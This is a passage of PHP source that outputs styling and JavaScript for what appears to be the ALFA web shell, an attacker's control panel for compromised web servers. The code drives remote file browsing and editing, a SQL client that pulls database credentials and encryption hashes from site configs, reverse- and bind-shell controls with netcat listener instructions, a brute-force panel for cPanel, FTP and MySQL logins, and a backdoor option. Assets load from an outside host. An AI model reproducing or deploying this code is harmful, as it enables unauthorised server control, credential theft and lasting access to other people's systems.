  1334. box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
  1335. }
  1336. .update-content {
  1337.     position: relative;
  1338. }
  1339. .update-content > a {
  1340.     text-decoration: none;
  1341.     position: absolute;
  1342.     color: rgba(103, 167, 47, 0.77);
  1343.     left: 24%;
  1344.     margin-top: 7%;
  1345.     font-size: 40px;
  1346.     font-family: "Francois One", sans-serif;
  1347. }
  1348. .update-close {
  1349.     position: absolute;
  1350.     right: 0;
  1351.     margin-right: 23px;
  1352.     top: 10px;
  1353.     font-size: 27px;
  1354.     background-color: #130f50;
  1355.     width: 5%;
  1356.     border-radius: 100px;
  1357.     cursor: pointer;
  1358.     border: 2px rgb(14, 38, 90) solid;
  1359. }
  1360. .update-close:hover {
  1361.     border: 2px #25ff00 solid;
  1362.     color: #FF0000;
  1363. }
  1364. .filestools {
  1365.     height: auto;
  1366.     width: auto;
  1367.     color: #67ABDF;
  1368.     font-size: 12px;
  1369.     font-family: Verdana,Geneva,sans-serif;
  1370. }
  1371. @-moz-document url-prefix() {
  1372.     #search-input {
  1373.         width: 173px;
  1374.     }
  1375.     .editor-path {
  1376.         top:3px;
  1377.     }
  1378. }
  1379. @keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}
  1380. @-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}
  1381. @-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}
  1382. @-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}
  1383. #alfaloader{'.$csscode.'width:100px;height:100px;}
  1384. #a_loader{'.$csscode.'width:150px;height:150px;position:fixed;z-index:999999;top: 42%;left: 45%;display:none;}
  1385. .ajaxarea{border:1px solid #0E304A;color:#67ABDF}#up_bar{background-color:red;width:0;height:2px;display:none;position:fixed;z-index:100000}#hidden_sh{background-color:#0E304A;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:"Comic Sans MS";font-size:small;text-decoration:none}.whole{background-color:#000;background-image:url(http://solevisible.com/images/alfabg.png);background-position:center;background-attachment:fixed;background-repeat:no-repeat}.header{height:auto;width:auto;border:7px solid #0E304A;color:'.alfa_getColor("header_values").';font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:"Comic Sans MS";font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:"Comic Sans MS";font-size:large;display:inline-block;color:#59cc33}.tbltxt{font-family:"Comic Sans MS";color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile strong{background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#0E304A;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{cursor:pointer;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:'.($GLOBALS['DB_NAME']['show_icons']=='1'?'0':'1').'px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";background-color:#0E304A;background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;border:1px solid #0F0;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#0E304A;border-style:solid}.whole #meunlist ul{text-align:center;list-style-type:none;margin:0;padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;padding:0;display:inline}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:100px;margin-right:-6px;border-right-width:1px;border-right-style:solid;border-right-color:#FFF;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#0E304A;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#0E304A}#text{text-align:center}input[type=submit]{cursor:pointer;background-image:url('.__showicon('btn').');background-repeat:no-repeat;background-position:50% 50%;background-size:23px 23px;background-color:#000;width:30px;height:30px;border:1px solid #27979B;border-radius:100px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #0E304A;background:#000;text-decoration:none;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}
  1386. .foottable{width: 300px;font-weight: bold;'.(!@is_writable($GLOBALS['cwd'])?'}.dir{background-color:red;}':'}').'
  1387. .main th{text-align:left;}
  1388. .main a{color: #FFF;}
  1389. .main tr:hover{background-color:#646464;}
  1390. .ml1{ border:1px solid #0E304A;padding:5px;margin:0;overflow: auto; }
  1391. .bigarea{ width:99%; height:300px; }
  1392. '.alfaCssLoadColors().'
  1393. </style>';
  1394. echo "<script type='text/javascript'>
  1395. var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
  1396. var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
  1397. var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
  1398. var alfa1_ = '" . ((strpos(@$_POST['alfa1'],"\n")!==false)?'':htmlspecialchars($_POST['alfa1'],ENT_QUOTES)) ."';
  1399. var alfa2_ = '" . ((strpos(@$_POST['alfa2'],"\n")!==false)?'':htmlspecialchars($_POST['alfa2'],ENT_QUOTES)) ."';
  1400. var alfa3_ = '" . ((strpos(@$_POST['alfa3'],"\n")!==false)?'':htmlspecialchars($_POST['alfa3'],ENT_QUOTES)) ."';
  1401. var alfa4_ = '" . ((strpos(@$_POST['alfa4'],"\n")!==false)?'':htmlspecialchars($_POST['alfa4'],ENT_QUOTES)) ."';
  1402. var alfa5_ = '" . ((strpos(@$_POST['alfa5'],"\n")!==false)?'':htmlspecialchars($_POST['alfa5'],ENT_QUOTES)) ."';
  1403. var alfa6_ = '" . ((strpos(@$_POST['alfa6'],"\n")!==false)?'':htmlspecialchars($_POST['alfa6'],ENT_QUOTES)) ."';
  1404. var alfa7_ = '" . ((strpos(@$_POST['alfa7'],"\n")!==false)?'':htmlspecialchars($_POST['alfa7'],ENT_QUOTES)) ."';
  1405. var alfa8_ = '" . ((strpos(@$_POST['alfa8'],"\n")!==false)?'':htmlspecialchars($_POST['alfa8'],ENT_QUOTES)) ."';
  1406. var alfa9_ = '" . ((strpos(@$_POST['alfa9'],"\n")!==false)?'':htmlspecialchars($_POST['alfa9'],ENT_QUOTES)) ."';
  1407. var alfa10_ = '" . ((strpos(@$_POST['alfa10'],"\n")!==false)?'':htmlspecialchars($_POST['alfa10'],ENT_QUOTES)) ."';
  1408. var d = document;
  1409. var mysql_cache = {};
  1410. var editor_files = {};
  1411. var editor_error = true;
  1412. var editor_current_file = '';
  1413. var is_minimized = false;
  1414. var cgi_is_minimized = false;
  1415. var cgi_lang = '';
  1416. var upcount = 1;
  1417. var islinux = ".($GLOBALS['sys']!="win"?'true':'false').";
  1418. var post_encryption_mode = ".(__ALFA_POST_ENCRYPTION__?'true':'false').";
  1419. function set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset) {
  1420. if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
  1421. if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;";
  1422. for($j=1;$j<=10;$j++){
  1423. echo 'if(alfa'.$j.'!=null)d.mf.alfa'.$j.'.value=alfa'.$j.';else d.mf.alfa'.$j.'.value=alfa'.$j.'_;';
  1424. }
  1425. echo "
  1426. if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
  1427. }";
  1428. echo 'function fc(a){alfaloader("block");var b="a="+alfab64("FilesMan")+"&c="+alfab64(a.c.value)+"&alfa1="+alfab64(a.alfa1.value)+"&ajax="+alfab64("true")+"&",c="";for(i=0;i<d.files.elements.length;i++)"checkbox"==d.files.elements[i].type&&d.files.elements[i].checked&&(c+="f[]="+alfab64(d.files.elements[i].value)+"&");_Ajax(d.URL,b+c,function(a){alfaloader("none")},!0)}function initDir(a){var b="",c="";islinux&&(b="<a class=\"header_pwd\" onclick=\"g(\'FilesMan\',\'/\');\" href=\'javascript:void(0);\'>/</a>",c="/");var e=a.split("/"),f="",g="";"-1"!=e.indexOf("..")&&(e.splice(e.indexOf("..")-1,1),e.splice(e.indexOf(".."),1));for(i in e)""!=e[i]&&(f+="<a onclick=\"g(\'FilesMan\',\'"+g+e[i]+"/\');\" href=\'javascript:void(0);\' class=\"header_pwd\">"+e[i]+"/</a>",g+=e[i]+"/");$("header_cwd").innerHTML=b+f+" ";var e=c+e.join("/");e=e.replace("//","/"),d.footer_form.c.value=e,$("footer_cwd").value=e,c_=e}function evalJS(html){var newElement=document.createElement("div");newElement.innerHTML=html;for(var scripts=newElement.getElementsByTagName("script"),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(a,b,c,e){var f=!1;return window.XMLHttpRequest?f=new XMLHttpRequest:window.ActiveXObject&&(f=new ActiveXObject("Microsoft.XMLHTTP")),f?(f.onreadystatechange=function(){4==f.readyState&&200==f.status&&("function"!=typeof c?d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText:e?(d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText,c(f.responseText)):c(f.responseText))},f.open("POST",a,!0),f.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),f.send(b),void 0):void alert("Error !")}function handleup(a,b){var c="__fnameup";0!=b&&(c="__fnameup"+b),a.files[0].name&&($(c).innerHTML=a.files[0].name)}function u(a){alfaloader("block");a.submit.disabled=true;var av = a.a.value,cv = a.c.value,alv = a.alfa1.value,cha = a.charset.value;var b=!1;if(a.a.value=alfab64(a.a.value),a.c.value=alfab64(a.c.value),a.alfa1.value=alfab64(a.alfa1.value),a.charset.value=alfab64(a.charset.value),window.XMLHttpRequest?b=new XMLHttpRequest:window.ActiveXObject&&(b=new ActiveXObject("Microsoft.XMLHTTP")),b){var c=$("up_bar");b.upload&&(c.style.display="block",b.upload.onprogress=function(a){var b=a.position||a.loaded,d=a.totalSize||a.total,e=Math.floor(b/d*1e3)/10+"%";c.style.width=e}),b.onload=function(e){for(200===b.status?(_Ajax(d.URL,"a="+alfab64("FilesMan")+"&c="+a.c.value+"&ajax="+alfab64("true")),c.style.display="none",a.a.value=av,a.c.value=cv,a.alfa1.value=alv,a.charset.value=cha):alert("An error occurred!"),$("footerup").value="",$("__fnameup").innerHTML="";upcount;){var f=$("pfooterup_"+upcount);f&&f.parentNode.removeChild(f),upcount--}0==upcount&&upcount++,alfaloader("none"),a.submit.disabled=false},b.onerror=function(a){};var e=new FormData(a);b.open("POST",d.URL),b.send(e)}}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),"GetConfig"!=a&&"download"!=alfa2&&(d.getElementsByClassName("ajaxarea")[0].innerHTML=\'<center><br /><img id="alfaloader" src="'.__showicon('loader').'"></img><br /><br /></center>\'),islinux&&"/"!=d.mf.c.value.substr(0,1)&&(d.mf.c.value="/"+d.mf.c.value);for(var data="a="+alfab64(a)+"&c="+alfab64(d.mf.c.value)+"&",i=1;i<=10;i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";if(data+="&ajax="+alfab64("true"),"FilesTools"==a&&"download"==alfa2){var dl=$("dlForm");return dl.a.value=alfab64("dlfile"),dl.c.value=alfab64(d.mf.c.value),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data),c!=c_&&c&&initDir(c)):(alfaloader("block"),_Ajax(d.URL,data,function(a){try{a=JSON.parse(a),a.host&&a.user&&a.dbname&&($("db_host")&&($("db_host").value=a.host),$("db_user")&&($("db_user").value=a.user),$("db_name")&&($("db_name").value=a.dbname),$("db_pw")&&($("db_pw").value=a.password),$("db_prefix")&&a.prefix&&($("db_prefix").value=a.prefix),$("cc_encryption_hash")&&a.cc_encryption_hash&&($("cc_encryption_hash").value=a.cc_encryption_hash))}catch(a){}alfaloader("none")}))}function alfaloader(a){$("a_loader").style.display=a}function fsu(a){alfaloader("block");for(var b={},c=0;c<a.elements.length;c++)"submit"!=a.elements[c].type&&(b[a.elements[c].name]=a.elements[c].value);for(c in mysql_cache)mysql_cache[c]=alfab64(mysql_cache[c]);_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64("update")+"&alfa2="+alfab64(JSON.stringify(b))+"&c="+alfab64(c_)+"&charset="+mysql_cache.charset+"&type="+mysql_cache.type+"&sql_host="+mysql_cache.host+"&sql_login="+mysql_cache.user+"&sql_pass="+mysql_cache.pass+"&sql_base="+mysql_cache.db+"&sql_count="+mysql_cache.count+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},!0)}function fs(f,e){alfaloader("block");var alfa1="query",alfa2=f.query?alfab64(f.query.value):"",host=f.sql_host?f.sql_host.value:mysql_cache.host,user=f.sql_login?f.sql_login.value:mysql_cache.user,pass=f.sql_pass?f.sql_pass.value:mysql_cache.pass,db=f.sql_base?f.sql_base.value:mysql_cache.db,type=f.type?f.type.value:mysql_cache.type,charset=f.charset?f.charset.value:mysql_cache.charset,count="";switch(count=f.sql_count?f.sql_count.checked?"true":"":mysql_cache.count,f){case"0":alfa1="select",alfa2=alfab64(e);break;case"1":e=eval(e),alfa1="select",alfa2=alfab64(e[0])+"&alfa3="+alfab64(e[1]);break;case"2":e=eval(e),alfa1="edit",alfa2=alfab64(db)+"&alfa3="+alfab64(e.join(":"));break;case"3":alfa1="loadfile",alfa2=alfab64(e);break;case"4":case"5":alfa1=(f=="4"?"dumpfile":"droptbl");var obj={},id=$("dumpfile");for(obj.file=id?id.value:"dump.sql",obj.tbl=[],i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked&&obj.tbl.push(d.sf.elements["tbl[]"][i].value);alfa2=alfab64(JSON.stringify(obj))}_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64(alfa1)+"&alfa2="+alfa2+"&c="+alfab64(c_)+"&charset="+alfab64(charset)+"&type="+alfab64(type)+"&sql_host="+alfab64(host)+"&sql_login="+alfab64(user)+"&sql_pass="+alfab64(pass)+"&sql_base="+alfab64(db)+"&sql_count="+alfab64(count)+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},!0)}function ctlbc(a){var b=$("bcStatus"),c=$("bcipAction");"bind"==a.value?(c.style.display="none",b.innerHTML="<small>Press ` <font color=\'red\'>>></font> ` button and run ` <font color=\'red\'>nc server_ip port</font> ` on your computer</small>"):(c.style.display="inline-block",b.innerHTML="<small>Run ` <font color=\'red\'>nc -l -v -p port</font> ` on your computer and press ` <font color=\'red\'>>></font> ` button</small>")}function is(){for(i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked=!d.sf.elements["tbl[]"][i].checked}function $(a){return d.getElementById(a)}function addnewup(){var a="footerup_"+upcount,b="pfooterup_"+upcount,c=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",e=d.createElement("p");e.innerHTML=\'<label class="inputfile" for="\'+a+\'"><span id="__fnameup\'+upcount+\'"></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id="\'+a+\'" type="file" name="f[]" onChange="handleup(this,\'+upcount+\');">\',e.id=b,e.appendAfter($(c)),upcount++}function alfa_searcher_tool(a){switch(a){case"all":case"dirs":_alfaSet(!0,"Disabled");break;case"files":_alfaSet(!1,"php")}}function _alfaSet(a,b){d.srch.ext.disabled=a,d.srch.ext.value=b}function dis_input(a){switch(a){case"phpmyadmin":bruteSet(!0,"Disabled","http://");break;case"direct":bruteSet(!1,"2222","http://");break;case"cp":bruteSet(!1,"2082","http://");break;case"ftp":bruteSet(!0,"Disabled","ftp://");break;case"mysql":bruteSet(!1,"3306","http://");break;case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(a,b,d){"21"!=b?c="localhost":c="ftp.example.com",$("port").disabled=a,$("port").value=b,$("target").value=c,$("protocol").value=d}Element.prototype.appendAfter=function(a){a.parentNode.insertBefore(this,a.nextSibling)};function inBackdoor(t){if(t.value=="my"){$("backdoor_textarea").style.display="block";}else{$("backdoor_textarea").style.display="none";}}
  1429. function saveByKey(event){
  1430.     if(!(String.fromCharCode(event.which).toLowerCase() == \'s\' && event.ctrlKey) && !(event.which == 19))return true;
  1431.     $("editor_edit_area").onsubmit();
  1432.     event.preventDefault();
  1433.     return false;
  1434. }
  1435. function setCookie(cname, cvalue, exdays){
  1436.     var d = new Date();
  1437.     d.setTime(d.getTime() + (exdays*24*60*60*1000));
  1438.     var expires = "expires="+ d.toUTCString();
  1439.     document.cookie = cname + "=" + cvalue + ";" + expires + ";path=/";
  1440. }
  1441. function getCookie(name){
  1442.   var value = "; " + document.cookie;
  1443.   var parts = value.split("; " + name + "=");
  1444.   if (parts.length == 2) return parts.pop().split(";").shift();
  1445. }
  1446. function editorClose(pos){
  1447.     d.body.style.overflow = "visible";
  1448.     elem = $(pos);
  1449.     elem.setAttribute("class", "editor-anim-close");
  1450.     if(pos == "editor"){
  1451.         is_minimized = false;
  1452.     }else{
  1453.         cgi_is_minimized = false;
  1454.     }
  1455.     setTimeout(function(){
  1456.         elem.removeAttribute("class");
  1457.         elem.style.display = "none";
  1458.     }, 1000);
  1459.     d.body.style.overflow = "visible";
  1460. }
  1461. function showEditor(pos){
  1462.     $(pos).setAttribute("class", "editor-anim-show");
  1463.     $(pos+"-minimized").setAttribute("class", "minimized-hide");
  1464.     if(pos == "editor"){
  1465.         is_minimized = false;
  1466.         if(cgi_is_minimized){
  1467.             $("cgiloader-minimized").style.top = "30%";
  1468.         }
  1469.     }else{
  1470.         cgi_is_minimized = false;
  1471.         if(is_minimized){
  1472.             $("editor-minimized").style.top = "30%";
  1473.         }
  1474.     }
  1475.     d.body.style.overflow = "hidden";
  1476. }
  1477. function editorMinimize(pos){
  1478.     $(pos).setAttribute("class", "editor-anim-minimize");
  1479.     $(pos+"-minimized").setAttribute("class", "minimized-show");
  1480.     if(pos == "editor"){
  1481.         is_minimized = true;
  1482.         if(cgi_is_minimized){
  1483.             $("cgiloader-minimized").style.top = "20%";
  1484.             $("editor-minimized").style.top = "50%";
  1485.         }else{
  1486.             $("editor-minimized").style.top = "30%";
  1487.         }
  1488.     }else{
  1489.         cgi_is_minimized = true;
  1490.         if(is_minimized){
  1491.             $("cgiloader-minimized").style.top = "20%";
  1492.             $("editor-minimized").style.top = "50%";
  1493.         }else{
  1494.             $("cgiloader-minimized").style.top = "30%";
  1495.         }
  1496.     }
  1497.     d.body.style.overflow = "visible";
  1498. }
  1499. function clearEditorHistory(){
  1500.     var check = confirm("Are u Sure?");
  1501.     if(check){
  1502.         for(var i in editor_files){
  1503.             if(i != editor_current_file){
  1504.                 removeHistory(i);
  1505.             }
  1506.         }
  1507.     }
  1508. }
  1509. function editor(file, mode, arg, pwd, file_id, type){
  1510.     if(type=="dir"&&file=="..")return false;
  1511.     if(mode == "download"){
  1512.         g("FilesTools",pwd,file,"download");
  1513.         return false;
  1514.     }
  1515.     var param = "", fid = "", pure_fid = "", cwd = d.mf.c.value, can_append = true;
  1516.     file = file.trim();
  1517.     if(Object.keys(editor_files).length == 0){
  1518.         var cookie_file = getCookie("alfa_history_files");
  1519.         try{
  1520.             editor_files = JSON.parse(cookie_file);
  1521.             for(var t in editor_files){
  1522.                 insertToHistory(t, editor_files[t].file, 0, editor_files[t].type);
  1523.             }
  1524.         }catch(e){}
  1525.     }
  1526.     if(file.indexOf("/") != -1){
  1527.         var file_split = file.split("/");
  1528.         file = file_split[file_split.length - 1];
  1529.         delete file_split[file_split.length - 1];
  1530.         cwd = file_split.join("/");
  1531.         if(islinux){
  1532.             cwd = "/"+cwd;
  1533.         }
  1534.     }
  1535.     if(typeof type == "undefined"){
  1536.         type = "";
  1537.     }
  1538.     if(typeof pwd != "undefined" && pwd != null && pwd.length != 0){
  1539.         cwd = pwd.trim();
  1540.     }
  1541.     try{
  1542.         for(var i in editor_files){
  1543.             if(editor_files[i].file == decodeURIComponent(file) && editor_files[i].pwd.replace(/\//g,"") == cwd.replace(/\//g,"")){
  1544.                 can_append = false;
  1545.                 file_id = i;
  1546.                 break;
  1547.             }
  1548.         }
  1549.     }catch(e){
  1550.         console.log(e);
  1551.     }
  1552.     editor_error = true;
  1553.     if(typeof arg != "undefined" && arg.length != 0 && arg != null){
  1554.         param = alfab64(arg);
  1555.     }
  1556.     if(typeof file_id != "undefined" && file_id != null && file_id.length != 0){
  1557.         fid = alfab64(file_id);
  1558.         pure_fid = file_id;
  1559.     }else{
  1560.         var rand_fid = "file_" + getRandom(10);
  1561.         fid = alfab64(rand_fid);
  1562.         pure_fid = rand_fid;
  1563.     }
  1564.     alfaloader("block");
  1565.     _Ajax(d.URL, "a="+alfab64("FilesTools")+"&c="+alfab64(cwd)+"&alfa1="+alfab64(file)+"&alfa2="+alfab64(mode)+"&alfa3="+param+"&alfa4="+fid+"&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax="+alfab64("true"), function(e){
  1566.         document.querySelector(".editor-content").innerHTML = e;
  1567.         $("editor").style.display  = "block";
  1568.         alfaloader("none");
  1569.         evalJS(e);
  1570.         if(mode != "delete" && editor_error){
  1571.             var active = d.getElementsByClassName("is_active");
  1572.             if(active.length != 0){
  1573.                 active[0].className = "file-holder";
  1574.             }
  1575.             fid = pure_fid;
  1576.             file = decodeURIComponent(file);
  1577.  
  1578.             if(!editor_files[fid] && can_append){
  1579.                 editor_files[fid] = {"file": file, "pwd": cwd, "type": type};
  1580.                 insertToHistory(fid, file, " is_active", type);
  1581.                 if(mode=="mkfile"){
  1582.                     g("FilesMan",null);
  1583.                 }
  1584.             }else{
  1585.                 $(fid).parentNode.className += " is_active";
  1586.             }
  1587.         }
  1588.         d.body.style.overflow = "hidden";
  1589.         d.getElementsByClassName("filestools")[0].setAttribute("fid", fid);
  1590.         if(editor_files[fid]){
  1591.             d.getElementsByClassName("editor-path")[0].innerHTML = (editor_files[fid].pwd + "/" + editor_files[fid].file).replace(/\/\//g, "/");
  1592.         }
  1593.         editor_current_file = fid;
  1594.         if(is_minimized){
  1595.             showEditor("editor");
  1596.         }
  1597.         updateCookieEditor();
  1598.     });
  1599.     return false;
  1600. }
  1601. function insertToHistory(fid, file, mode, type){
  1602.     var active = "";
  1603.     if(mode && mode != 0){
  1604.         active = mode;
  1605.     }
  1606.     var NewElement = document.createElement("div");
  1607.     NewElement.innerHTML = "<div id=\'"+fid+"\' class=\'history\' onClick=\'reopen(this);\'><div class=\'editor-icon\'>"+loadType(file,type,fid)+"</div><div class=\'editor-file-name\'>"+file+"</div></div><div class=\'history-close\' onClick=\'removeHistory(\""+fid+"\");\'>X</div>";
  1608.     NewElement.className = "file-holder" + active;
  1609.     NewElement.addEventListener("mouseover", function(){setEditorTitle(fid,"over");this.childNodes[1].style.opacity = "1";});
  1610.     NewElement.addEventListener("mouseout", function(){setEditorTitle(fid,"out");this.childNodes[1].style.opacity = "0";});
  1611.     var refNode = d.getElementsByClassName("history-list")[0];
  1612.     refNode.insertBefore(NewElement, refNode.firstChild);
  1613. }
  1614. function loadType(file,type,id){
  1615.     if(type == "none"){
  1616.         _Ajax(d.URL, "a="+alfab64("checkfiletype")+"&path="+alfab64(editor_files[id].pwd)+"&arg="+alfab64(editor_files[id].file), function(e){
  1617.             $(id).innerHTML = "<div class=\'editor-icon\'>"+loadType(editor_files[id].file,e,id)+"</div><div class=\'editor-file-name\'>"+editor_files[id].file+"</div>";
  1618.             editor_files[id].type = e;
  1619.         });
  1620.     }
  1621.     var img = \'<img src="http://solevisible.com/icons/{type}" width="30" height="30">\';
  1622.     if(type == "file"){
  1623.         type = file.split(".");
  1624.         type  = type[type.length - 1].toLowerCase();
  1625.         var types = ["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"];
  1626.         if(types.indexOf(type) == -1){
  1627.             type = "notfound";
  1628.         }
  1629.     }else{
  1630.         type = "folder";
  1631.     }
  1632.     return img.replace("{type}",  type + ".png");
  1633. }
  1634. function updateDirsEditor(fid, fname){
  1635.     var current_path = d.mf.c.value + "/";
  1636.     var oldpath  = editor_files[fid].pwd + "/" + fname + "/";
  1637.     var newpath  = editor_files[fid].pwd + "/" + editor_files[fid].file + "/";
  1638.     oldpath = oldpath.replace(/\/\//g, "/");
  1639.     newpath = newpath.replace(/\/\//g, "/");
  1640.     current_path = current_path.replace(/\/\//g, "/");
  1641.     if(current_path.search(oldpath) != -1){
  1642.         initDir(current_path.replace(oldpath, newpath));
  1643.         d.mf.c.value = current_path.replace(oldpath, newpath);
  1644.         _Ajax(d.URL,"a="+alfab64("updatepath")+"&path="+alfab64(d.mf.c.value),function(e){console.log(e)});
  1645.     }
  1646.     for(var i in editor_files){
  1647.         var path = editor_files[i].pwd + "/";
  1648.         path = path.replace(/\/\//g, "/");
  1649.         if(path.search(oldpath) != -1){
  1650.             editor_files[i].pwd = path.replace(oldpath, newpath);
  1651.         }
  1652.     }
  1653.     var reg1 = new RegExp("\'"+oldpath.slice(0, -1)+"\'");
  1654.     var reg2 = new RegExp(fname + " \\\|</b></a>");
  1655.     d.files.innerHTML = d.files.innerHTML.replace(reg1, "\'"+newpath.slice(0, -1)+"\'");
